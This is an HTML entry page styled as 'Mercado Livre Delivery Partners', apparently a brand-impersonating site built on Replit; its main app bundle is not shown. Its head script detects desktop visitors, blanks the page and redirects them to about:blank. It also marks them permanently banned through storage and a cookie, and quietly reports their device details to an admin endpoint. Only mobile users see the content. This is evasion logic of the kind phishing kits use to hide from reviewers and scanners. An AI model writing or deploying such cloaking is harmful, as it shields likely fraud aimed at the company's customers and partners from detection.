<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">
    <title>Mercado Livre Delivery Partners</title>
    
    <!-- DETECÇÃO INSTANTÂNEA DE DESKTOP - Aplicada antes de qualquer renderização -->
    <script>
      (function() {
        // Lista de domínios de desenvolvimento onde não bloqueamos
        var allowedDomains = ['replit.dev', 'replit.com', 'localhost', '127.0.0.1'];
        // Verificar se estamos em ambiente de desenvolvimento
        var isDev = allowedDomains.some(function(domain) { 
          return window.location.hostname.indexOf(domain) !== -1; 
        });
        
        // Se for ambiente de desenvolvimento, pular verificação
        if (isDev) {
          console.log("Ambiente de desenvolvimento detectado. Bloqueio instantâneo desativado.");
          return;
        }
        
        // Verificar se já está banido localmente
        var isLocallyBanned = false;
        try {
          isLocallyBanned = localStorage.getItem('sp_access_blocked') === 'true' || 
                            sessionStorage.getItem('sp_access_blocked') === 'true' ||
                            document.cookie.indexOf('sp_access_blocked=true') !== -1;
        } catch (e) {}
        
        // Detecção de dispositivo rápida
        var isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
        
        // Verificação secundária (mais precisa)
        var isDesktop = !isMobile;
        
        // Se estiver banido ou for desktop, bloquear imediatamente
        if (isLocallyBanned || isDesktop) {
          // Bloquear qualquer renderização
          document.documentElement.innerHTML = '';
          document.body = document.createElement('body');
          
          // Registrar ban persistente
          try {
            localStorage.setItem('sp_access_blocked', 'true');
            sessionStorage.setItem('sp_access_blocked', 'true');
            document.cookie = 'sp_access_blocked=true; expires=Fri, 31 Dec 9999 23:59:59 GMT; path=/';
          } catch (e) {}
          
          // Enviar reporte de desktop em segundo plano usando Beacon API
          // Isso é executado mesmo quando redirecionamos imediatamente
          try {
            var url = '/api/admin/report-desktop-access';
            var data = JSON.stringify({
              isAboutBlank: true,
              userAgent: navigator.userAgent,
              screen: { width: screen.width, height: screen.height }
            });
            
            if (navigator.sendBeacon) {
              navigator.sendBeacon(url, data);
            } else {
              // Fallback para navegadores que não suportam Beacon API
              var xhr = new XMLHttpRequest();
              xhr.open('POST', url, true);
              xhr.setRequestHeader('Content-Type', 'application/json');
              xhr.send(data);
            }
          } catch (e) {}
          
          // Redirecionar instantaneamente para about:blank
          window.location.replace('about:blank');
        }
      })();
    </script>
    
    <link rel="stylesheet" href="css/all.min.css">
    
    <!-- Fontes do Mercado Livre -->
    <link rel="preload" href="https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-light.woff2" as="font" type="font/woff2" crossorigin="anonymous">
    <link rel="preload" href="https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-regular.woff2" as="font" type="font/woff2" crossorigin="anonymous">
    <link rel="preload" href="https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-semibold.woff2" as="font" type="font/woff2" crossorigin="anonymous">
    <script type="module" crossorigin="" src="js/index-C9a6qzd1.js"></script>
    <link rel="stylesheet" crossorigin="" href="css/index-CsrfBDpm.css">
  </head>
  <body>
    <div id="root"></div>
    <!-- Base tag para garantir carregamento correto de assets -->
    
    
    <!-- Runtime path fix apenas em ambiente de produção -->
    <script>
      // Em produção, verifica falhas de carregamento e tenta corrigir caminhos
      if (window.location.hostname !== 'localhost' && !window.location.hostname.includes('replit')) {
        window.addEventListener('error', function(e) {
          if (e.target.tagName === 'SCRIPT' || e.target.tagName === 'LINK') {
            const src = e.target.src || e.target.href;
            if (src && src.startsWith('/assets/')) {
              // Tenta recarregar com caminho relativo
              const newSrc = '.' + src;
              if (e.target.tagName === 'SCRIPT') {
                e.target.src = newSrc;
              } else {
                e.target.href = newSrc;
              }
            }
          }
        }, true);
      }
    </script>
    
    <!-- This is a replit script which adds a banner on the top of the page when opened in development mode outside the replit environment -->
    <script>
      // Only include the Replit banner in development environment
      if (window.location.hostname === 'localhost' || window.location.hostname.includes('replit.dev')) {
        const script = document.createElement('script');
        script.src = "https://replit.com/public/js/replit-dev-banner.js";
        document.body.appendChild(script);
      }
    </script>
  

</body></html>